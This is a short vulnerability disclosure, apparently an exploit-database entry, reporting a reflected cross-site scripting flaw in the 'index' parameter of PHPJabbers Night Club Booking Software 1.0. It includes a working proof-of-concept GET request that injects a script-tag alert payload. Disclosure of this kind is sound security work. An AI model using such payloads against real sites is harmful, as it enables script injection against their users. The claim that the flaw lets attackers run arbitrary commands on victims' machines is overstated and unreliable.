## Title: Night Club Booking Software-1.0 XSS-Reflected ## Author: nu11secur1ty ## Date: 09/09/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo ## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected ## Description: The value of the index request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload byymt"><script>alert(1)</script>fs5xr was submitted in the index parameter. This input was echoed unmodified in the application's response. The attacker can trick the victim into executing arbitrary commands or code on his machine remotely. STATUS: HIGH-CRITICAL Vulnerability [+]Test Payload: ```GET /1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date= HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178; _gat=1; _fbp=fb.1.1694256177815.1029224882 X-Requested-With: XMLHttpRequest Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0 ) ## Proof and Exploit: [href]( https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html ) ## Time spent: 00:05:00